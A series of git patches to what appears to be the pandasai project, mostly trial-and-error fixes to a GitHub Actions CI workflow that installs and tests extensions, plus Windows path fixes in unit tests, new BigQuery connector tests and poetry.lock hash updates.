- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
- name: Lint with ruff
run: make format_diff
- name: Spellcheck
run: make spell_check
- name: Run core tests
run: make test_core
+
+ # Install dependencies, test, and remove for each extension
+ - name: Install and test LLM extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/llms -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
+ - name: Install and test Connector extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/connectors -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
+ - name: Install and test Enterprise extensions (Unix)
+ if: matrix.os != 'windows-latest'
+ run: |
+ find extensions/ee -mindepth 1 -type d | while read -r dir; do
+ if [ -f "$dir/pyproject.toml" ]; then
+ echo "Installing dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry install --all-extras
+ )
+ echo "Running tests for $dir"
+ (
+ cd "$dir" || exit
+ poetry run pytest tests/
+ )
+ echo "Cleaning up dependencies for $dir"
+ (
+ cd "$dir" || exit
+ poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ )
+ fi
+ done
+
- name: Run extension tests
if: matrix.os != 'windows-latest'
run: make test_extensions
@@ -152,9 +166,3 @@ jobs:
flags: unittests
name: codecov-umbrella
fail_ci_if_error: false
-
- - name: Clean up space after job
- run: |
- echo "Cleaning up space after job"
- sudo rm -rf /tmp/* # Clear temporary files
- sudo df -h # Check disk usage
From 9a29b78c0f6eb59804c48574186a9df541ee8b53 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:51:52 +0100
Subject: [PATCH 40/58] fix ci pipeline
---
.github/workflows/ci.yml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 40a352962..96530ca64 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -65,6 +65,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
@@ -88,6 +89,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
@@ -111,6 +113,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
From 65cd422c7e6517c4645caeff106300e6df926dfc Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:56:27 +0100
Subject: [PATCH 41/58] fix ci pipeline
---
.github/workflows/ci.yml | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 96530ca64..f3eea9e91 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,7 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
@@ -65,7 +65,6 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
)
fi
done
@@ -78,7 +77,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
@@ -102,7 +101,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
From 2cd235302e3311d5753c1b260e911082a7f60325 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:58:23 +0100
Subject: [PATCH 42/58] fix ci pipeline
---
.github/workflows/ci.yml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index f3eea9e91..cd706443e 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,6 +55,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
@@ -78,6 +79,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
@@ -102,6 +104,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
From def1433b1e9c7554811b61e4b18810917b7c0efd Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:05:03 +0100
Subject: [PATCH 43/58] fix ci pipeline
---
.github/workflows/ci.yml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index cd706443e..171814669 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,7 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
@@ -78,7 +78,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
@@ -103,7 +103,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
From ee62baff08a03d2c341796b7b1114ed7e7a78b37 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:16:45 +0100
Subject: [PATCH 44/58] fix: ci
---
.github/workflows/ci.yml | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 171814669..d93d2b9a0 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,7 +55,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -79,7 +79,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -90,7 +90,6 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
)
fi
done
@@ -104,7 +103,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -115,7 +114,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
+ poetry add pytest@7.4.0
)
fi
done
From 09587497675b5009c0a8c0719ae143d7f2dd1acf Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:23:27 +0100
Subject: [PATCH 45/58] fix: ci
---
.github/workflows/ci.yml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d93d2b9a0..7cee04e25 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -65,6 +65,7 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
)
fi
@@ -89,6 +90,7 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
)
fi
@@ -113,8 +115,8 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest@7.4.0
)
fi
done
From bcec0715c4e5cfccfeb36cd7f18f27d25892d4b1 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:25:33 +0100
Subject: [PATCH 46/58] fix: ci
---
.github/workflows/ci.yml | 18 ------------------
1 file changed, 18 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 7cee04e25..4465a8298 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -62,12 +62,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
@@ -87,12 +81,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
@@ -112,12 +100,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
From 2da13980df973b916954b6496235e5bab25508aa Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:40:51 +0100
Subject: [PATCH 47/58] fix github bug
---
extensions/llms/bedrock/tests/test_bedrock_claude.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/extensions/llms/bedrock/tests/test_bedrock_claude.py b/extensions/llms/bedrock/tests/test_bedrock_claude.py
index 2c022bcaf..1991518c6 100644
--- a/extensions/llms/bedrock/tests/test_bedrock_claude.py
+++ b/extensions/llms/bedrock/tests/test_bedrock_claude.py
@@ -68,7 +68,7 @@ def test_params_setting(self):
assert llm.top_k is None
assert llm.max_tokens == 64
- def test_call(self, mocker, prompt):
+ def test_call(self, prompt):
llm = BedrockClaude(bedrock_runtime_client=MockBedrockRuntimeClient())
expected_text = "This is the expected text."
result = llm.call(instruction=prompt)
From 7570c2baaf6a4cca2328d8923e8fed77f84893c8 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:49:59 +0100
Subject: [PATCH 48/58] fix: CI
---
.github/workflows/ci.yml | 3 ---
1 file changed, 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 4465a8298..3f78249c1 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,7 +55,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -74,7 +73,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -93,7 +91,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
From f2f15ce301bbb4ac5ec3faa0dd005650bd466f89 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:52:04 +0100
Subject: [PATCH 49/58] fix: CI
---
.github/workflows/ci.yml | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 3f78249c1..d6c324bac 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,6 +55,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
@@ -73,6 +76,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
@@ -91,6 +97,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
From f8e5f2386f8deb7cbfe6df2db95d7618a5890dec Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:58:02 +0100
Subject: [PATCH 50/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index c0165a720..9bb48d3d1 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -118,7 +118,10 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.schema = sample_schema
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path.endswith("datasets/test/users/users.parquet")
+ if sys.platform.startswith("win"):
+ assert cache_path.endswith("datasets\\test\\users\\users.parquet")
+ else:
+ assert cache_path.endswith("datasets/test/users/users.parquet")
def test_get_cache_file_path_without_destination_path(self, sample_schema):
schema_without_path = sample_schema.copy()
@@ -127,7 +130,10 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.schema = schema_without_path
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path.endswith("datasets/test/users/data.parquet")
+ if sys.platform.startswith("win"):
+ assert cache_path.endswith("datasets\\test\\users\\data.parquet")
+ else:
+ assert cache_path.endswith("datasets/test/users/data.parquet")
def test_is_cache_valid(self, sample_schema):
loader = DatasetLoader()
From 59b42ed13c879835a9773d84622507a502f83c79 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:00:46 +0100
Subject: [PATCH 51/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 9bb48d3d1..a6f3f8c8d 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -3,6 +3,7 @@
import pandas as pd
import pytest
+import sys
from pandasai.data_loader.loader import DatasetLoader
from pandasai.dataframe.base import DataFrame
From 7e207eb20e56533f39d9496b07c03c28f5205f36 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:02:28 +0100
Subject: [PATCH 52/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index a6f3f8c8d..266b592e2 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -1,9 +1,9 @@
+import sys
from datetime import datetime, timedelta
from unittest.mock import mock_open, patch
import pandas as pd
import pytest
-import sys
from pandasai.data_loader.loader import DatasetLoader
from pandasai.dataframe.base import DataFrame
From 3982c4590d3ac61d949e6b7ebc0039fa50270fcc Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:10:40 +0100
Subject: [PATCH 53/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 266b592e2..9ebed40e5 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -120,7 +120,7 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
if sys.platform.startswith("win"):
- assert cache_path.endswith("datasets\\test\\users\\users.parquet")
+ assert cache_path.endswith("datasets\\test/users\\users.parquet")
else:
assert cache_path.endswith("datasets/test/users/users.parquet")
@@ -132,7 +132,7 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
if sys.platform.startswith("win"):
- assert cache_path.endswith("datasets\\test\\users\\data.parquet")
+ assert cache_path.endswith("datasets\\test/users\\data.parquet")
else:
assert cache_path.endswith("datasets/test/users/data.parquet")
From ecafc64043e865d63115e27c6f3939655b55c054 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:40:41 +0100
Subject: [PATCH 54/58] fix: CI
---
.github/workflows/ci.yml | 15 ++++++++++++---
1 file changed, 12 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d6c324bac..d438353d8 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -109,9 +109,6 @@ jobs:
fi
done
- - name: Run extension tests
- if: matrix.os != 'windows-latest'
- run: make test_extensions
- name: Run extension tests (Windows)
if: matrix.os == 'windows-latest'
run: |
@@ -121,6 +118,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
@@ -132,6 +133,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
@@ -143,6 +148,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
From 64e51e34e3f1cc6a63f623873c317d683a97c564 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:02:54 +0100
Subject: [PATCH 55/58] feat(biqquery): add test cases for big query connector
---
.../bigquery/pandasai_bigquery/__init__.py | 3 +-
extensions/ee/connectors/bigquery/poetry.lock | 48 ++++++-------
.../ee/connectors/bigquery/pyproject.toml | 2 +-
.../bigquery/tests/test_bigquery.py | 68 +++++++++++++++++++
4 files changed, 91 insertions(+), 30 deletions(-)
create mode 100644 extensions/ee/connectors/bigquery/tests/test_bigquery.py
diff --git a/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py b/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
index bdce28f4e..6d0ffb928 100644
--- a/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
+++ b/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
@@ -1,6 +1,5 @@
from google.cloud import bigquery
import pandas as pd
-from .google_big_query import GoogleBigQueryConnector
def load_from_bigquery(connection_info, query):
@@ -13,4 +12,4 @@ def load_from_bigquery(connection_info, query):
return pd.DataFrame(query_job.result())
-__all__ = ["GoogleBigQueryConnector", "load_from_bigquery"]
+__all__ = ["load_from_bigquery"]
diff --git a/extensions/ee/connectors/bigquery/poetry.lock b/extensions/ee/connectors/bigquery/poetry.lock
index d0b8fece2..dab545136 100644
--- a/extensions/ee/connectors/bigquery/poetry.lock
+++ b/extensions/ee/connectors/bigquery/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.4 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
[[package]]
name = "cachetools"
@@ -890,39 +890,58 @@ description = "Database Abstraction Library"
optional = false
python-versions = ">=3.7"
files = [
+ {file = "SQLAlchemy-2.0.36-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:59b8f3adb3971929a3e660337f5dacc5942c2cdb760afcabb2614ffbda9f9f72"},
+ {file = "SQLAlchemy-2.0.36-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:37350015056a553e442ff672c2d20e6f4b6d0b2495691fa239d8aa18bb3bc908"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8318f4776c85abc3f40ab185e388bee7a6ea99e7fa3a30686580b209eaa35c08"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c245b1fbade9c35e5bd3b64270ab49ce990369018289ecfde3f9c318411aaa07"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:69f93723edbca7342624d09f6704e7126b152eaed3cdbb634cb657a54332a3c5"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f9511d8dd4a6e9271d07d150fb2f81874a3c8c95e11ff9af3a2dfc35fe42ee44"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-win32.whl", hash = "sha256:c3f3631693003d8e585d4200730616b78fafd5a01ef8b698f6967da5c605b3fa"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-win_amd64.whl", hash = "sha256:a86bfab2ef46d63300c0f06936bd6e6c0105faa11d509083ba8f2f9d237fb5b5"},
+ {file = "SQLAlchemy-2.0.36-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:fd3a55deef00f689ce931d4d1b23fa9f04c880a48ee97af488fd215cf24e2a6c"},
+ {file = "SQLAlchemy-2.0.36-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:4f5e9cd989b45b73bd359f693b935364f7e1f79486e29015813c338450aa5a71"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0ddd9db6e59c44875211bc4c7953a9f6638b937b0a88ae6d09eb46cced54eff"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2519f3a5d0517fc159afab1015e54bb81b4406c278749779be57a569d8d1bb0d"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:59b1ee96617135f6e1d6f275bbe988f419c5178016f3d41d3c0abb0c819f75bb"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:39769a115f730d683b0eb7b694db9789267bcd027326cccc3125e862eb03bfd8"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-win32.whl", hash = "sha256:66bffbad8d6271bb1cc2f9a4ea4f86f80fe5e2e3e501a5ae2a3dc6a76e604e6f"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-win_amd64.whl", hash = "sha256:23623166bfefe1487d81b698c423f8678e80df8b54614c2bf4b4cfcd7c711959"},
+ {file = "SQLAlchemy-2.0.36-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:f7b64e6ec3f02c35647be6b4851008b26cff592a95ecb13b6788a54ef80bbdd4"},
+ {file = "SQLAlchemy-2.0.36-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:46331b00096a6db1fdc052d55b101dbbfc99155a548e20a0e4a8e5e4d1362855"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fdf3386a801ea5aba17c6410dd1dc8d39cf454ca2565541b5ac42a84e1e28f53"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ac9dfa18ff2a67b09b372d5db8743c27966abf0e5344c555d86cc7199f7ad83a"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:90812a8933df713fdf748b355527e3af257a11e415b613dd794512461eb8a686"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:1bc330d9d29c7f06f003ab10e1eaced295e87940405afe1b110f2eb93a233588"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-win32.whl", hash = "sha256:79d2e78abc26d871875b419e1fd3c0bca31a1cb0043277d0d850014599626c2e"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-win_amd64.whl", hash = "sha256:b544ad1935a8541d177cb402948b94e871067656b3a0b9e91dbec136b06a2ff5"},
+ {file = "SQLAlchemy-2.0.36-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:b5cc79df7f4bc3d11e4b542596c03826063092611e481fcf1c9dfee3c94355ef"},
+ {file = "SQLAlchemy-2.0.36-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:3c01117dd36800f2ecaa238c65365b7b16497adc1522bf84906e5710ee9ba0e8"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9bc633f4ee4b4c46e7adcb3a9b5ec083bf1d9a97c1d3854b92749d935de40b9b"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9e46ed38affdfc95d2c958de328d037d87801cfcbea6d421000859e9789e61c2"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:b2985c0b06e989c043f1dc09d4fe89e1616aadd35392aea2844f0458a989eacf"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4a121d62ebe7d26fec9155f83f8be5189ef1405f5973ea4874a26fab9f1e262c"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-win32.whl", hash = "sha256:0572f4bd6f94752167adfd7c1bed84f4b240ee6203a95e05d1e208d488d0d436"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-win_amd64.whl", hash = "sha256:8c78ac40bde930c60e0f78b3cd184c580f89456dd87fc08f9e3ee3ce8765ce88"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:be9812b766cad94a25bc63bec11f88c4ad3629a0cec1cd5d4ba48dc23860486b"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50aae840ebbd6cdd41af1c14590e5741665e5272d2fee999306673a1bb1fdb4d"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4557e1f11c5f653ebfdd924f3f9d5ebfc718283b0b9beebaa5dd6b77ec290971"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-musllinux_1_2_aarch64.whl", hash = "sha256:07b441f7d03b9a66299ce7ccf3ef2900abc81c0db434f42a5694a37bd73870f2"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-musllinux_1_2_x86_64.whl", hash = "sha256:28120ef39c92c2dd60f2721af9328479516844c6b550b077ca450c7d7dc68575"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-win32.whl", hash = "sha256:b81ee3d84803fd42d0b154cb6892ae57ea6b7c55d8359a02379965706c7efe6c"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-win_amd64.whl", hash = "sha256:f942a799516184c855e1a32fbc7b29d7e571b52612647866d4ec1c3242578fcb"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3d6718667da04294d7df1670d70eeddd414f313738d20a6f1d1f379e3139a545"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:72c28b84b174ce8af8504ca28ae9347d317f9dba3999e5981a3cd441f3712e24"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b11d0cfdd2b095e7b0686cf5fabeb9c67fae5b06d265d8180715b8cfa86522e3"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e32092c47011d113dc01ab3e1d3ce9f006a47223b18422c5c0d150af13a00687"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:6a440293d802d3011028e14e4226da1434b373cbaf4a4bbb63f845761a708346"},
